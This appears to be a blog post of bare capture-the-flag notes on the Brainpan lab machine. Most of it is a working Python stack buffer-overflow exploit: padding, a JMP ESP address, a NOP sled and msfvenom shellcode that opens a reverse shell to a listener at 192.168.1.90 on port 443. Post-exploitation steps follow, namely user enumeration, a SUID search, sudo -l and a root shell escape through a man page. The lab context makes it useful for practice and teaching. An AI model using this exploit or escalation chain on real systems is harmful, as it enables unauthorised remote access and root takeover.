192.168.1.97
#!/usr/bin/python
import socket
# msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.1.90 LPORT=443 EXITFUNC=thread -f python -v payload -b "\x00"
payload = b""
payload += b"\xda\xdc\xbe\x1b\xe9\x6c\x36\xd9\x74\x24\xf4\x58"
payload += b"\x33\xc9\xb1\x12\x31\x70\x17\x03\x70\x17\x83\xf3"
payload += b"\x15\x8e\xc3\x32\x3d\xb8\xcf\x67\x82\x14\x7a\x85"
payload += b"\x8d\x7a\xca\xef\x40\xfc\xb8\xb6\xea\xc2\x73\xc8"
payload += b"\x42\x44\x75\xa0\x94\x1e\x84\x6a\x7d\x5d\x87\x8b"
payload += b"\xc6\xe8\x66\x3b\x5e\xbb\x39\x68\x2c\x38\x33\x6f"
payload += b"\x9f\xbf\x11\x07\x4e\xef\xe6\xbf\xe6\xc0\x27\x5d"
payload += b"\x9e\x97\xdb\xf3\x33\x21\xfa\x43\xb8\xfc\x7d"
#buffer = 'A' * (528-len(payload)) + "DCBA"
# 311712F3 JMP ESP
buffer = 'A' * 524 + "\xF3\x12\x17\x31" + "\x90"*16 + payload + "\x90"*(1000-528-len(payload))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect(('192.168.1.99', 9999))
s.connect(('192.168.1.97', 9999))
data = s.recv(1024)
s.send(buffer)
s.close()
Linux brainpan 3.5.0-25-generic #39-Ubuntu SMP Mon Feb 25 19:02:34 UTC 2013 i686 i686 i686 GNU/Linux
PRETTY_NAME="Ubuntu quantal (12.10)"
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash
find / -perm -u=s 2>/dev/null
/usr/local/bin/validate
sudo -l
(root) NOPASSWD: /home/anansi/bin/anansi_util
sudo /home/anansi/bin/anansi_util manual man
!/bin/bash
No comments:
Post a Comment